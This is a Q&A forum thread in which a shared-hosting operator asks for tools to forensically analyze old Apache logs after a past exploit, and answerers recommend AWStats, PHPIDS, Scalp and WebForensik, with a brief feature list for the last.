6

What I need is a forensic log analyzer tool for apache to do the after math of a successful abuse of service attack which took place 2-3 month in the past. We are running a shared hosting service and one of our customers seems to have (or had) an exploitable script running. I suspect that I could find clues and hints in the logs but they are just too huge to browse through them manually or grep regexps from them.

Is there a tool which can do it and has predefined search patterns for known attacks and probably even heuristics to discover suspicious activities?

I do not look for a tool to do real-time blocking of such attempts because I need to analyze past logs and see if the exploit has been closed.

hurikhan77
  • 880

2 Answers2

3

Probably, AWStats can help you. It is a free and open-source tool.

Edit/Update:
Check out Phpida and Scalp as well. They are security analyzers looking for HTTP attacks, SQL injection etc.
http://sourceforge.net/projects/phpida/
http://code.google.com/p/apache-scalp/

swatkat
  • 559
2

Check out WebForensik

It's a PHPIDS-based script (released under GPL2) to scan your HTTPD logfiles for attacks against web applications.

Features:

  • supports standard log formats (common, combined)
  • allows user-defined (mod_log_config syntax) formats
  • automatically pipes your web logs through PHPIDS
  • categorizes all incidents by type, impact, date, host...
  • generates reports in CSV, HTML (sortable table), XML
guy_intro
  • 21
  • 1